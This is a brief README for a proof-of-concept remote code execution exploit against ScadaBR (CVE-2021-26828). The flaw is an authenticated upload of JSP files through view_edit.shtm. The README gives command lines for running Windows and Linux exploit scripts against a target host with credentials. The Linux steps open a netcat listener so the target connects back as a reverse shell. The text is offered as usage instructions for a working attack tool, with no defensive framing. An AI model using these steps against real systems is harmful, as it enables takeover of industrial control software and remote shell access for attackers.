POC CVE-2021-26828_ScadaBR_RemoteCodeExecution
- ScadaBR 0.9.1 on Linux and through 1.0 and 1.12.4CE on Windows allows remote authenticated users to upload and execute arbitrary JSP files via 'view_edit.shtm' and Remote Code Execution.
Exploit Usage
Commands:
- Windows:
$ sudo python WinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass>
- Linux: First in your local machine open any port before exploit execution:
$ sudo nc -vnlp 4444
$ sudo python LinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass> <Reverse_IP> <Reverse_Port>
